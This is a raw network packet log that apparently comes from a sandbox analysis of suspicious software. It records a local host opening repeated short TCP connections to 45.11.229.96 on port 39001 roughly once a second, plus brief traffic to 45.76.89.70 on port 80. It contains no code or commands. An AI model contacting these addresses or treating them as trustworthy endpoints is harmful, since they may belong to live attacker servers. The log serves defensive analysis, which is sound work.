Sep 19, 2024 02:26:17.988096952 CEST	39001	49792	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:18.607374907 CEST	39001	49792	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:18.607570887 CEST	49792	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:18.607666016 CEST	49792	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:18.612473011 CEST	39001	49792	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:18.716595888 CEST	49793	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:18.721478939 CEST	39001	49793	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:18.721556902 CEST	49793	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:18.734738111 CEST	49793	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:18.739607096 CEST	39001	49793	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:18.739659071 CEST	49793	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:18.744496107 CEST	39001	49793	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:19.349019051 CEST	39001	49793	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:19.349189043 CEST	49793	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:19.349236012 CEST	49793	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:19.354239941 CEST	39001	49793	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:19.466494083 CEST	49794	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:19.471510887 CEST	39001	49794	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:19.471592903 CEST	49794	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:19.481884003 CEST	49794	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:19.486716986 CEST	39001	49794	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:19.486799002 CEST	49794	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:19.491585016 CEST	39001	49794	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.101684093 CEST	39001	49794	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.101753950 CEST	49794	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.101960897 CEST	49794	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.107340097 CEST	39001	49794	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.216434002 CEST	49795	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.221250057 CEST	39001	49795	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.221343040 CEST	49795	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.232357025 CEST	49795	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.237123966 CEST	39001	49795	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.237196922 CEST	49795	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.241933107 CEST	39001	49795	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.860259056 CEST	39001	49795	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.860347986 CEST	49795	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.860490084 CEST	49795	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.865223885 CEST	39001	49795	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.969402075 CEST	49796	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.974261045 CEST	39001	49796	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.974371910 CEST	49796	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.987581968 CEST	49796	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:20.992337942 CEST	39001	49796	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:20.996263027 CEST	49796	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.001172066 CEST	39001	49796	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:21.726711988 CEST	39001	49796	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:21.726774931 CEST	49796	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.726870060 CEST	49796	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.841975927 CEST	49797	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.933474064 CEST	39001	49796	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:21.933552027 CEST	49796	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.933645964 CEST	39001	49796	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:21.933712006 CEST	39001	49797	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:21.933810949 CEST	49797	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.947216988 CEST	49797	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.952023029 CEST	39001	49797	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:21.952095032 CEST	49797	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:21.956857920 CEST	39001	49797	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:22.664722919 CEST	39001	49797	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:22.664828062 CEST	49797	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:22.664936066 CEST	49797	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:22.669737101 CEST	39001	49797	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:22.779057026 CEST	49798	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:22.783961058 CEST	39001	49798	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:22.784040928 CEST	49798	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:22.798695087 CEST	49798	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:22.804044962 CEST	39001	49798	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:22.804264069 CEST	49798	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:22.809089899 CEST	39001	49798	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:23.456717968 CEST	39001	49798	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:23.456861973 CEST	49798	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:23.456976891 CEST	49798	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:23.461760998 CEST	39001	49798	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:23.575973034 CEST	49799	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:23.581008911 CEST	39001	49799	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:23.581407070 CEST	49799	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:23.594815969 CEST	49799	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:23.599641085 CEST	39001	49799	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:23.599708080 CEST	49799	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:23.604574919 CEST	39001	49799	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:24.241971970 CEST	39001	49799	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:24.242037058 CEST	49799	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.242206097 CEST	49799	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.247029066 CEST	39001	49799	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:24.357595921 CEST	49800	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.362473011 CEST	39001	49800	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:24.362577915 CEST	49800	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.399046898 CEST	49800	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.403985977 CEST	39001	49800	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:24.404063940 CEST	49800	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.408987999 CEST	39001	49800	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:24.983758926 CEST	39001	49800	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:24.983998060 CEST	49800	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.983998060 CEST	49800	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:24.988943100 CEST	39001	49800	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.091976881 CEST	49801	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.096914053 CEST	39001	49801	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.097004890 CEST	49801	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.159018993 CEST	49801	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.163963079 CEST	39001	49801	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.164042950 CEST	49801	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.168852091 CEST	39001	49801	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.741516113 CEST	39001	49801	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.742204905 CEST	49801	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.742305040 CEST	49801	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.747138977 CEST	39001	49801	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.857121944 CEST	49802	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.863168001 CEST	39001	49802	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.863254070 CEST	49802	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.897315025 CEST	49802	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.902333975 CEST	39001	49802	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:25.903578043 CEST	49802	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:25.911839962 CEST	39001	49802	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:26.518465996 CEST	39001	49802	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:26.522301912 CEST	49802	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:26.575392962 CEST	49802	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:26.580518007 CEST	39001	49802	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:26.685031891 CEST	49803	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:26.694739103 CEST	39001	49803	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:26.696866989 CEST	49803	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:26.906400919 CEST	49803	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:26.911469936 CEST	39001	49803	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:26.911552906 CEST	49803	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:26.916518927 CEST	39001	49803	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:27.384632111 CEST	39001	49803	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:27.384864092 CEST	49803	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:27.385042906 CEST	49803	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:27.389867067 CEST	39001	49803	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:27.544550896 CEST	49804	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:27.549649954 CEST	39001	49804	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:27.549755096 CEST	49804	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:27.585766077 CEST	49804	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:27.590800047 CEST	39001	49804	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:27.593599081 CEST	49804	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:27.598426104 CEST	39001	49804	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:28.202830076 CEST	39001	49804	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:28.202913046 CEST	49804	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.203366041 CEST	49804	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.208200932 CEST	39001	49804	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:28.310456038 CEST	49805	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.315598965 CEST	39001	49805	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:28.315680027 CEST	49805	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.343864918 CEST	49805	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.348798990 CEST	39001	49805	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:28.348858118 CEST	49805	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.353621960 CEST	39001	49805	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:28.974575043 CEST	39001	49805	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:28.977885008 CEST	49805	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.980927944 CEST	49805	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:28.985888004 CEST	39001	49805	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.185463905 CEST	49806	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.190583944 CEST	39001	49806	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.190689087 CEST	49806	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.596537113 CEST	49806	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.601706028 CEST	39001	49806	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.602181911 CEST	49806	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.607539892 CEST	39001	49806	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.820024967 CEST	39001	49806	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.820122004 CEST	49806	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.820262909 CEST	49806	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.825041056 CEST	39001	49806	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.936455011 CEST	49807	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.941582918 CEST	39001	49807	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.941679001 CEST	49807	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.969984055 CEST	49807	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.975007057 CEST	39001	49807	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:29.975166082 CEST	49807	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:29.980077028 CEST	39001	49807	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:30.643558979 CEST	39001	49807	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:30.643763065 CEST	49807	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:30.644490004 CEST	49807	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:30.649293900 CEST	39001	49807	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:30.747867107 CEST	49808	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:30.752983093 CEST	39001	49808	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:30.753096104 CEST	49808	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:30.783735037 CEST	49808	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:30.788788080 CEST	39001	49808	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:30.788981915 CEST	49808	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:30.793874025 CEST	39001	49808	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:31.415260077 CEST	39001	49808	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:31.415625095 CEST	49808	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:31.420584917 CEST	49808	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:31.425440073 CEST	39001	49808	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:31.533200026 CEST	49809	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:31.538115025 CEST	39001	49809	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:31.538201094 CEST	49809	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.128524065 CEST	49809	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.134181976 CEST	39001	49809	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:32.134258986 CEST	49809	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.139156103 CEST	39001	49809	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:32.573379040 CEST	39001	49809	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:32.573542118 CEST	49809	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.573595047 CEST	49809	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.578572035 CEST	39001	49809	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:32.685096025 CEST	49810	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.690387011 CEST	39001	49810	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:32.690490961 CEST	49810	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.854099989 CEST	49810	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.858844042 CEST	39001	49810	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:32.858915091 CEST	49810	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:32.866941929 CEST	39001	49810	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:33.192766905 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:26:33.278217077 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:26:33.383833885 CEST	39001	49810	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:33.383971930 CEST	49810	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:33.384064913 CEST	49810	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:33.389108896 CEST	39001	49810	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:33.497673988 CEST	49811	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:33.502891064 CEST	39001	49811	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:33.503006935 CEST	49811	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:33.688956976 CEST	49811	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:33.694013119 CEST	39001	49811	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:33.694101095 CEST	49811	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:33.698997021 CEST	39001	49811	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:34.157316923 CEST	39001	49811	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:34.157481909 CEST	49811	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.157587051 CEST	49811	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.162429094 CEST	39001	49811	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:34.263449907 CEST	49812	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.269242048 CEST	39001	49812	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:34.269335032 CEST	49812	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.471412897 CEST	49812	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.476488113 CEST	39001	49812	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:34.476579905 CEST	49812	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.488842964 CEST	39001	49812	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:34.916887045 CEST	39001	49812	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:34.916969061 CEST	49812	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.917073965 CEST	49812	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:34.921871901 CEST	39001	49812	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.029819012 CEST	49813	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.034792900 CEST	39001	49813	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.034888029 CEST	49813	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.064280987 CEST	49813	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.069367886 CEST	39001	49813	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.069443941 CEST	49813	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.079255104 CEST	39001	49813	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.665258884 CEST	39001	49813	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.665342093 CEST	49813	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.665472984 CEST	49813	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.670284033 CEST	39001	49813	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.779026985 CEST	49814	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.899322987 CEST	39001	49814	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.899415970 CEST	49814	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.969321012 CEST	49814	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.974275112 CEST	39001	49814	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:35.975028038 CEST	49814	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:35.979825974 CEST	39001	49814	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:36.546145916 CEST	39001	49814	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:36.546350956 CEST	49814	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:36.546350956 CEST	49814	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:36.551259041 CEST	39001	49814	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:36.653795004 CEST	49815	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:36.658835888 CEST	39001	49815	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:36.658919096 CEST	49815	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:36.738145113 CEST	49815	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:36.919519901 CEST	39001	49815	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:36.919625044 CEST	49815	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:36.924823046 CEST	39001	49815	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:37.289966106 CEST	39001	49815	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:37.290035009 CEST	49815	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:37.290673971 CEST	49815	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:37.295535088 CEST	39001	49815	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:37.405891895 CEST	49816	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:37.411943913 CEST	39001	49816	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:37.412041903 CEST	49816	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:37.435142040 CEST	49816	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:37.439950943 CEST	39001	49816	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:37.440035105 CEST	49816	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:37.444808006 CEST	39001	49816	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:38.041829109 CEST	39001	49816	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:38.041932106 CEST	49816	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:38.042042971 CEST	49816	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:38.046974897 CEST	39001	49816	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:38.154119968 CEST	49817	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:38.160154104 CEST	39001	49817	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:38.160259962 CEST	49817	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:38.704091072 CEST	49817	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:38.709117889 CEST	39001	49817	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:38.709197998 CEST	49817	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:38.714164972 CEST	39001	49817	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.031944990 CEST	39001	49817	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.032044888 CEST	49817	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.032155991 CEST	49817	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.036932945 CEST	39001	49817	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.138262033 CEST	49818	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.143158913 CEST	39001	49818	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.143249989 CEST	49818	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.168473005 CEST	49818	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.173310041 CEST	39001	49818	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.173382998 CEST	49818	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.178179026 CEST	39001	49818	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.803450108 CEST	39001	49818	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.804224014 CEST	49818	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.804331064 CEST	49818	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.811845064 CEST	39001	49818	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.919827938 CEST	49819	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:39.927417994 CEST	39001	49819	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:39.927520037 CEST	49819	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:40.073560953 CEST	49819	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:40.078500986 CEST	39001	49819	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:40.082185984 CEST	49819	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:40.087040901 CEST	39001	49819	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:40.582755089 CEST	39001	49819	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:40.583694935 CEST	49819	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:40.583801031 CEST	49819	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:40.591128111 CEST	39001	49819	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:40.700962067 CEST	49820	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:40.705910921 CEST	39001	49820	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:40.706216097 CEST	49820	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.102745056 CEST	49820	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.107881069 CEST	39001	49820	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:41.107928038 CEST	49820	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.113490105 CEST	39001	49820	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:41.364408970 CEST	39001	49820	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:41.364491940 CEST	49820	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.364607096 CEST	49820	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.369332075 CEST	39001	49820	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:41.482055902 CEST	49821	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.486970901 CEST	39001	49821	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:41.487071037 CEST	49821	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.511152983 CEST	49821	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.515934944 CEST	39001	49821	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:41.516014099 CEST	49821	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:41.520932913 CEST	39001	49821	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:42.118812084 CEST	39001	49821	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:42.122060061 CEST	49821	39001	192.168.2.5	45.11.229.96
